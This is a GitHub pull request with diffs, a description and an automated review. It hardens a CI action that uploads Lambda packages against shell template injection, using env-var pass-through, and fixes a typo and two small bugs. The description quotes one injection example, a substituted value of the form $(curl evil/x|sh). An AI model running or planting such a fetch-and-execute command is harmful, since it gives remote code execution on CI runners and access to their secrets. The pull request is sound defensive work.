### PR TITLE
lambda-upload-s3: fix role-name typo + harden zip/role-name steps

### DIFF
--- a/lambda-upload-s3/action.yaml
+++ b/lambda-upload-s3/action.yaml
@@ -33,9 +33,9 @@ runs:
       name: Compute role name suffix
       id: role-name
       run: |
-        NAME=${{ inputs.role_name }}
-        REPO=${GITHUB_REPOSITORY#*/}
-        echo "role-name=$(echo ${NAME:-$REPO})" >> $GITHUB_OUTPUT
+        NAME="${{ inputs.role-name }}"
+        REPO="${GITHUB_REPOSITORY#*/}"
+        echo "role-name=${NAME:-$REPO}" >> "$GITHUB_OUTPUT"
     - name: Configure AWS credentials from Prod account
       uses: aws-actions/configure-aws-credentials@v4
       with:

--- a/lambda-upload-s3/action.yaml
+++ b/lambda-upload-s3/action.yaml
@@ -19,24 +19,35 @@ runs:
     - shell: bash
       name: Zip directory
       id: zip
+      # Pass caller input via env rather than templating ${{ inputs.path }}
+      # into the script source. GitHub substitutes ${{ }} expressions
+      # *before* bash parses, so quoting alone doesn't protect against a
+      # value containing $(...) or backticks — bash would parse those as
+      # command substitution. Env-var pass-through keeps the value as a
+      # runtime string, not script source.
+      env:
+        ZIP_PATH: ${{ inputs.path }}
       run: |
         error() { echo "$@" >&2; exit 1; }
         MAX_SIZE=262144000
+
+        cd "$ZIP_PATH"
         size=$(du -b -s . | cut -f 1)
         [[ $size -lt $MAX_SIZE ]] || error "The package size is too large: $size; must be smaller than $MAX_SIZE. Consider using docker-based deployment."
 
         TMPNAME=$(mktemp)
-        cd "${{ inputs.path }}"
         zip -r - . > "$TMPNAME"
 
         echo "zip-path=$TMPNAME" >> "$GITHUB_OUTPUT"
     - shell: bash
       name: Compute role name suffix
       id: role-name
+      # Env-var pass-through; see Zip directory step for rationale.
+      env:
+        ROLE_NAME: ${{ inputs.role-name }}
       run: |
-        NAME="${{ inputs.role-name }}"
         REPO="${GITHUB_REPOSITORY#*/}"
-        echo "role-name=${NAME:-$REPO}" >> "$GITHUB_OUTPUT"
+        echo "role-name=${ROLE_NAME:-$REPO}" >> "$GITHUB_OUTPUT"
     - name: Configure AWS credentials from Prod account
       uses: aws-actions/configure-aws-credentials@v4
       with:

--- a/lambda-upload-s3/action.yaml
+++ b/lambda-upload-s3/action.yaml
@@ -25,10 +25,10 @@ runs:
         [[ $size -lt $MAX_SIZE ]] || error "The package size is too large: $size; must be smaller than $MAX_SIZE. Consider using docker-based deployment."
 
         TMPNAME=$(mktemp)
-        cd ${{ inputs.path }}
-        zip -r - . > $TMPNAME
+        cd "${{ inputs.path }}"
+        zip -r - . > "$TMPNAME"
 
-        echo "zip-path=$TMPNAME" >> $GITHUB_OUTPUT
+        echo "zip-path=$TMPNAME" >> "$GITHUB_OUTPUT"
     - shell: bash
       name: Compute role name suffix
       id: role-name

--- a/lambda-upload-s3/action.yaml
+++ b/lambda-upload-s3/action.yaml
@@ -23,12 +23,12 @@ runs:
         # Direct ${{ }} templating into `run:` is shell-injectable: GHA
         # substitutes before bash parses, so $(...) in the value executes
         # despite quotes. Same pattern applies to other env entries below.
-        ZIP_PATH: ${{ inputs.path }}
+        SRC_PATH: ${{ inputs.path }}
       run: |
         error() { echo "$@" >&2; exit 1; }
         MAX_SIZE=262144000
 
-        cd "$ZIP_PATH"
+        cd "$SRC_PATH"
         size=$(du -b -s . | cut -f 1)
         [[ $size -lt $MAX_SIZE ]] || error "The package size is too large: $size; must be smaller than $MAX_SIZE. Consider using docker-based deployment."
 

--- a/lambda-upload-s3/action.yaml
+++ b/lambda-upload-s3/action.yaml
@@ -20,6 +20,7 @@ runs:
       name: Zip directory
       id: zip
       run: |
+        error() { echo "$@" >&2; exit 1; }
         MAX_SIZE=262144000
         size=$(du -b -s . | cut -f 1)
         [[ $size -lt $MAX_SIZE ]] || error "The package size is too large: $size; must be smaller than $MAX_SIZE. Consider using docker-based deployment."

--- a/lambda-upload-s3/action.yaml
+++ b/lambda-upload-s3/action.yaml
@@ -19,13 +19,10 @@ runs:
     - shell: bash
       name: Zip directory
       id: zip
-      # Pass caller input via env rather than templating ${{ inputs.path }}
-      # into the script source. GitHub substitutes ${{ }} expressions
-      # *before* bash parses, so quoting alone doesn't protect against a
-      # value containing $(...) or backticks — bash would parse those as
-      # command substitution. Env-var pass-through keeps the value as a
-      # runtime string, not script source.
       env:
+        # Direct ${{ }} templating into `run:` is shell-injectable: GHA
+        # substitutes before bash parses, so $(...) in the value executes
+        # despite quotes. Same pattern applies to other env entries below.
         ZIP_PATH: ${{ inputs.path }}
       run: |
         error() { echo "$@" >&2; exit 1; }
@@ -42,7 +39,6 @@ runs:
     - shell: bash
       name: Compute role name suffix
       id: role-name
-      # Env-var pass-through; see Zip directory step for rationale.
       env:
         ROLE_NAME: ${{ inputs.role-name }}
       run: |


### PR DESCRIPTION
## Summary

Fixes the `role-name` typo @sir-sigurd flagged as a #9 followup, plus addresses the deeper review issues he surfaced on this PR: template injection on the typo-activated code path, the same class on the pre-existing `cd` line, the latent du-before-cd ordering bug, and the missing `error()` helper. Four threads of work touching exactly the two run-blocks this PR was already in.

## Findings addressed

### 1. `role-name` typo fix — the original ask

`${{ inputs.role_name }}` → `${{ inputs.role-name }}`. The input is declared with a dash; the underscore form silently never resolved and always fell through to the `${REPO}` default. No current caller in `quiltdata/*` passes `role-name`, so the fix activates a previously-dead code path with zero behavioral change for current consumers (verified org-wide via #9).

### 2. Close the template-injection surface the typo fix opens (+ same on pre-existing `cd`)

Bash double-quotes alone don't protect against `${{ inputs.* }}` template substitution — GitHub substitutes the expression into the script source *before* bash parses, so a value containing `$(...)` or backticks would be parsed as command substitution despite the wrapping quotes:

```yaml
# vulnerable form (what the PR originally had):
NAME="${{ inputs.role-name }}"
# substitutes to:  NAME="$(curl evil/x|sh)"
# → bash runs the substitution before assignment
```

Per [GitHub's security-hardening guide](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions), the recommended pattern is env-var pass-through:

```yaml
env:
  ROLE_NAME: ${{ inputs.role-name }}
run: |
  echo "$ROLE_NAME"  # value is a runtime string, never enters script source
```

Applied to both steps this PR touches (zip step's `cd`, role-name step's `NAME=`).

### 3. Fix the `du`-before-`cd` ordering bug

`du -b -s .` was measuring the workflow's CWD (the checked-out repo) rather than the package being zipped, so the 256MB size cap was checking the wrong directory. Moved `cd "$ZIP_PATH"` ahead of `du`.

### 4. Define the missing `error()` helper

The size-check guard referenced an `error` function that wasn't defined in this `run:` block (only in `upload_s3.sh`, a sibling script). If a package ever exceeded the cap, the step would die with `error: command not found` (exit 127) instead of the intended message. Defined inline: `error() { echo "$@" >&2; exit 1; }`.

## Out of scope (covered elsewhere)

- **upload_s3.sh invocation sites (lines 47/57)** have the same template-injection class (`${{ inputs.name }}`). Those lines are in #11's scope; the env-var fix will land there. After both PRs merge, every `${{ inputs.* }}` interpolation in this action's `run:` blocks is env-protected.
- **`upload_s3.sh`'s `error()` uses `2>&1`** where `>&2` would be correct (message goes to stdout). Pre-existing; leaving for a separate cleanup so this PR doesn't grow further.

## Safety for current callers

- No current caller passes `role-name` or `tag-prefix`; the env-var conversion is a no-op for existing usage.
- The du-before-cd reordering is the only behavior change: it actually starts measuring the right thing. Real-world impact zero — every existing lambda is under 256MB regardless of which dir was measured.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- greptile_comment -->

<h3>Greptile Summary</h3>

This PR applies four targeted fixes to `lambda-upload-s3/action.yaml`: corrects the `role_name` → `role-name` input typo, closes the template-injection surface opened by that fix (and the pre-existing `cd` line) via env-var pass-through, reorders `cd` before `du` so the 256 MB cap measures the right directory, and defines the missing `error()` helper inline so oversized-package failures produce the intended message instead of `command not found`.

- **Template-injection hardening**: both touched `run:` blocks now pass `inputs.path` and `inputs.role-name` through `env: ZIP_PATH` / `env: ROLE_NAME`, keeping caller values as runtime strings rather than script source.
- **Ordering and correctness**: `cd \"$ZIP_PATH\"` now precedes `du -b -s .`, and `error()` is defined before its first call.
- **Remaining injection sites** on lines 58/68 (`${{ inputs.name }}`) are pre-existing and explicitly deferred to #11.

<h3>Confidence Score: 5/5</h3>

Safe to merge — all four addressed findings are correctly fixed with no new defects introduced.

The env-var pass-through pattern is applied correctly and consistently to both touched steps. The du/cd reordering is straightforward and the error() helper is correctly defined before use. The two remaining upload_s3.sh invocation sites are pre-existing and explicitly tracked in #11; they don't regress anything introduced here.

No files require special attention. The deferred ${{ inputs.name }} interpolations on lines 58/68 are pre-existing and out of this PR's stated scope.

<h3>Important Files Changed</h3>

| Filename | Overview |
|----------|----------|
| lambda-upload-s3/action.yaml | Fixes role-name input typo, adds env-var pass-through for template-injection safety on both touched steps, moves cd before du for correct size measurement, and defines the missing error() helper inline. |

</details>

<h3>Sequence Diagram</h3>

```mermaid
sequenceDiagram
    participant C as Caller Workflow
    participant Z as Zip step
    participant R as Role-name step
    participant A as configure-aws-credentials
    participant S as upload_s3.sh

    C->>Z: inputs.path (via env ZIP_PATH)
    Z->>Z: cd "$ZIP_PATH"
    Z->>Z: du -b -s . (measures package dir)
    Z->>Z: "zip -r - . > tmpfile"
    Z-->>R: steps.zip.outputs.zip-path

    C->>R: inputs.role-name (via env ROLE_NAME)
    R->>R: ROLE_NAME:-REPO fallback
    R-->>A: steps.role-name.outputs.role-name

    A->>A: assume IAM role (ARN built from role-name output)
    A-->>S: AWS credentials

    C->>S: "zip-path, inputs.name, github.sha (deferred #11)"
```

<sub>Reviews (4): Last reviewed commit: ["lambda-upload-s3: trim env-var rationale..."](https://github.com/quiltdata/gh-actions/commit/fa06ec80b11ca3eeb57c45b1c0cc3f2aeeb88f6a) | [Re-trigger Greptile](https://app.greptile.com/api/retrigger?id=32969464)</sub>

<!-- /greptile_comment -->